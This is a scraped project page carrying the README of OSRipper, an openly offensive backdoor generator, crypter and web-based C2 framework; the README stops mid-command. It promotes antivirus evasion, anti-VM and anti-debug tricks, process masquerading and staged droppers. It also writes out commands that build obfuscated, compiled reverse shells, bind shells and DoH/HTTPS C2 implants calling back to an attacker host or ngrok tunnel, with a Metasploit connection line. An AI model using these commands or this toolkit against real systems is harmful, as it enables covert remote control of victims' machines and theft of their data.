SkillAgentSearch skills...

OSRipper

AV evading cross platform Backdoor and Crypter Framework with a integrated lightweight webUI

Install / Use

/learn @NoahOksuz/OSRipper

README

OSRipper v0.4.2

<div align="center">

OSRipper Logo

CodeFactor Python Version License Platform

Advanced cross-platform payload generator and crypter with FUD capabilities

FeaturesQuick StartWeb UIPayload TypesDocumentation

</div>

Overview

OSRipper is a sophisticated, fully undetectable (FUD) backdoor generator and crypter designed for authorized penetration testing and red team operations. It features advanced evasion techniques, multiple payload types, and a modern web-based C2 interface for managing compromised systems.

Key Highlights

  • Fully Undetectable (FUD) - Advanced evasion techniques bypass modern AV solutions
  • Web-Based C2 Interface - Modern dashboard for managing active sessions
  • Multiple Payload Types - Bind shells, reverse shells, DoH C2, HTTPS C2, and more
  • Multi-Layer Obfuscation - Standard and enhanced obfuscation with randomized variables
  • Binary Compilation - Compile payloads to standalone executables
  • Encrypted Communications - SSL/TLS and certificate-pinned HTTPS C2 channels
  • Stealth Features - VM detection, anti-debugging, process masquerading

Features

Payload Generation

| Payload Type | Description | Use Case | |-------------|-------------|----------| | Bind Shell | Opens port on victim machine | Direct access when reverse connections blocked | | Reverse TCP Meterpreter | SSL/TLS encrypted reverse connection | Standard penetration testing | | DNS-over-HTTPS C2 | Stealthy DoH-based command & control | Bypass network restrictions | | HTTPS C2 | Certificate-pinned HTTPS C2 | Secure, authenticated C2 channel | | Staged Payload | Multi-stage web delivery | Enhanced stealth deployment | | Custom Code Crypter | Obfuscate any Python script | Custom payload encryption |

Evasion Techniques

  • Advanced Obfuscation - Multi-layer code encoding with random variables
  • Enhanced Obfuscation - Anti-debug, VM detection, junk code injection
  • Anti-VM Detection - Sandbox and virtual machine evasion
  • Stealth Delays - Random startup delays (5-15 seconds)
  • Process Masquerading - Disguise as legitimate system processes
  • Signature Randomization - Every payload is unique

Web UI Features

  • Session Dashboard - View all active C2 sessions
  • Interactive Terminal - Execute commands via web interface
  • Payload Generator - Generate payloads directly from web UI
  • Session Management - View system info, command history, and manage sessions
  • Real-time Updates - Live command execution and response viewing

Advanced Capabilities

  • Ngrok Integration - Automatic tunnel creation for dynamic IPs
  • Certificate Pinning - Secure HTTPS C2 with certificate validation
  • Session Persistence - Maintain connections across restarts
  • Command Queueing - Queue commands for offline agents
  • Response Parsing - Automatic parsing of command output

Quick Start

Installation

# Clone repository
git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper

# Install dependencies
pip3 install -r requirements.txt

# Install package
pip3 install -e .

Important — run setup for optional features (ngrok, binary compilation):
On many systems (especially Linux with an externally-managed Python environment), you must run the built-in setup so optional dependencies are installed into OSRipper’s own venv. Do this once after installation:

osripper-cli setup

This creates ~/.local/share/osripper/venv, installs pyngrok, nuitka, and sandboxed there, and all later runs of osripper / osripper-cli will use them automatically. Without this, --ngrok and --compile will prompt you to run setup. Use osripper-cli setup --system only if you prefer a system/user pip install instead of the venv.

Basic Usage

Interactive Mode:

osripper
# or
python3 -m osripper

Command Line:

# Generate reverse shell
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --compile

# Generate DoH C2 payload
osripper-cli doh -d example.com --obfuscate --compile

Web UI:

# Start C2 server with web UI
python -m osripper.c2.server example.com --port 5000

# Access dashboard at http://localhost:5000

Web UI

OSRipper includes a modern web-based C2 interface for managing compromised systems.

Features

  • Dashboard - Overview of all active sessions
  • Session Management - View system information and execute commands
  • Payload Generator - Generate DoH and HTTPS payloads via web interface
  • Command History - Track all executed commands and responses
  • Real-time Updates - Live command execution and response viewing

Starting the C2 Server

# Basic usage
python -m osripper.c2.server example.com

# With HTTPS
python -m osripper.c2.server example.com --https

# Custom port
python -m osripper.c2.server example.com --port 8080

# With custom certificate
python -m osripper.c2.server example.com --https --cert server.crt --key server.key

Accessing the Web UI

Once the server is running, access the dashboard at:

  • HTTP: http://localhost:5000
  • HTTPS: https://localhost:5000 (if enabled)

Payload Types

1. Bind Shell Backdoor

Opens a port on the victim machine and waits for connections.

osripper-cli bind -p 4444 --obfuscate --compile

Connection:

msfconsole -q -x 'use python/meterpreter/bind_tcp; set RHOST target_ip; set RPORT 4444; exploit'

2. Reverse TCP Meterpreter

Encrypted reverse connection with SSL/TLS.

osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --enhanced --compile

3. DNS-over-HTTPS C2

Stealthy C2 channel using DNS-over-HTTPS protocol. Bypasses many network restrictions.

# Generate payload
osripper-cli doh -d example.com --obfuscate --compile

# Start C2 server
python -m osripper.c2.server example.com

Features:

  • Stealthy DNS-based communication
  • Web UI for session management
  • Automatic session persistence
  • Command queueing for offline agents

4. HTTPS C2 (Certificate Pinning)

Secure HTTPS C2 with certificate pinning for authentication.

# Generate payload (via web UI or CLI)
# Start C2 server with HTTPS
python -m osripper.c2.server example.com --https

# Get certificate fingerprint
curl http://localhost:5000/api/cert-fingerprint

Features:

  • Certificate pinning for security
  • Encrypted HTTPS communication
  • Web UI integration
  • Session management

5. Staged Payload

Multi-stage web delivery for enhanced stealth.

osripper-cli staged -H 192.168.1.100 -p 8080 --obfuscate

6. Custom Code Crypter

Obfuscate and encrypt any Python script.

osripper-cli custom --script mypayload.py --obfuscate --enhanced --compile

Command Line Interface

Common Options

| Option | Description | |-------|-------------| | --obfuscate | Enable multi-layer obfuscation | | --enhanced | Enhanced obfuscation (anti-debug, VM detection) | | --compile | Compile to standalone binary | | --icon PATH | Custom icon for compiled binary | | --delay | Add random startup delay (5-15 seconds) | | --output, -o NAME | Output filename | | --quiet, -q | Quiet mode (minimal output) |

Examples

# Full-featured reverse shell
osripper-cli reverse -H 192.168.1.100 -p 4444 \
  --obfuscate --enhanced --compile --icon app.ico --delay

# DoH C2 with all features
osripper-cli doh -d example.com \
  --obfuscate --enhanced --compile --delay

# Custom script encryption
osripper-cli custom --script malware.py \
  --obfuscate --enhanced --compile

# Using ngrok for dynamic IP
osripper-cli reverse --ngrok -p 4444 --obfuscate --compile

Detection Results

Latest VirusTotal Scans

antiscan result

Antiscan Results


Architecture

┌─────────────────┐
│   Generated     │
│    Binary       │
└─────────────────┘
         │
         │ Execute
         ▼
┌──────────────────┐
│ Obfuscated       │
│ Dropper          │
└──────────────────┘
         │
         │ HTTP/HTTPS/DoH
         ▼
┌─────────────────┐
│                 │
│   C2 SERVER     │
│   (Web UI)      │
│                 │
└─────────────────┘
         │
         │ Command/Response
         ▼
┌─────────────────┐
│   Agent         │
│   Execution     │
└─────────────────┘

Screenshots

Main Interface

Web UI Dashboard

Web UI Dashboard


Advanced Configuration

Ngrok Integration

# Generate payload with ngrok
osripper-cli reverse --ngrok -p 4444

# Follow prompts to set up tunnel
# Run: ngrok tcp 4444

Custom Icons

osripper-cli reverse -H 192.168.1.100 -p 4444 \
  --compile --icon /path/to/icon.ico

Obfuscation Levels

Standard Obfuscation:

  • Multi-layer encoding
  • Variable randomization
  • Code structure obfuscation

Enhanced Obfuscation:

  • All standard features
  • Anti-debugging techniques
  • VM detection
  • Junk code injection
  • Advanced evasion
# Standard
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate

# Enhanced
os

Related Skills

View on GitHub
GitHub Stars323
CategoryDevelopment
Updated4d ago
Forks54

Languages

Python

Security Score

100/100

Audited on Apr 1, 2026

No findings